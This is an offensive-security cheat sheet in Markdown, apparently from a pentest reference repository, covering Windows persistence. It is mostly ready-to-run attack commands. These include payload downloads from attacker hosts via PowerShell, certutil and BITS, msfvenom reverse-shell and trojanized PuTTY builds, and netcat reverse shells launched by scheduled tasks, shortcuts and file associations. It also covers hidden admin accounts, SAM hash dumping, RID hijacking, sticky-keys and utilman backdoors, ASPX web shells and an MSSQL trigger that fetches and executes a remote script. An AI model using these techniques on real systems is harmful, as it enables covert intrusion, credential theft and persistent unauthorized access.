killchain-compendium/persistence/persistence.md

324 lines
9.3 KiB
Markdown

# Persistence
* Gain through
* Startup folder persistence
* Editing registry keys
* Scheduled tasks
* SUID
* BITS
* Creating a backdoored service
* Creat user
* RDP
## Gain Persistence on Windows
* Browser. Add to trusted sites.
* Powershell
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```
* DOSprompt
```cmd
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp`
### Paths to Persistence
* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Put the reverse_shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"
```
### Background Intelligence Transfer Service (BITS)
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```
## Elevate Privileges
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup administrators <user> /add`
* Check `net localgroup Administrator`
### More stealthy
* Backup Operator group is more stealthy, no admin by r/w on files
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* The following two groups are assigned through membership of `Backup Operators`
* SeBackupPrivilege, read files
* SeRestorePrivilege, write files
* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
* Backup `SAM` and `SYSTEM` via
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash via evil-winrm
### secedit
* Get r/w on files through editing a config file
* Export secedit and open it
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
### Relative ID (RID)
* UID like in linux
* Administrator has `RID = 500`
* Other interactive users `RID >= 1000`
* Get RIDs
```sh
wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
* Insert LE hex of `0d500`, which is `f401`
## Add to registry
* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```
## Add a Service
### Meterpreter
* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```
### Powershell
* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```
* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```
* Modify an existing service
* Enumerate all the services
```sh
sc.exe query state=all
```
* Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
* Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```
## Add Scheduled Task
```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
* Check task
```sh
schtasks /query /tn SteamUpdater
```
* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```
## File Backdoor
### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```
### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
* Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```
### File Association
* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1`
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
## Persistence via Logon
### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```
### Registry Keys
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
* Either `shell` or `Userinit` can be appended with a comma separated command
### Logon Scripts
* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
## RDP or Login Screen
### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe`
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```
### Utilman
* Ease of access button is clickable at the login screen, it is executed with system privileges
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
## Web Shell
* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege`
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`
## MSSQL
* Triggers bind actions such as INSERTs
* Open Microsoft SQL Server Management Studio
* Choose windows auth
* `New Query`
* Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
* Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```
* Change to DB
```sh
USE <DATABASE>
```
* Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```
* Trigger the trigger by visiting the site which triggers the trigger through a db call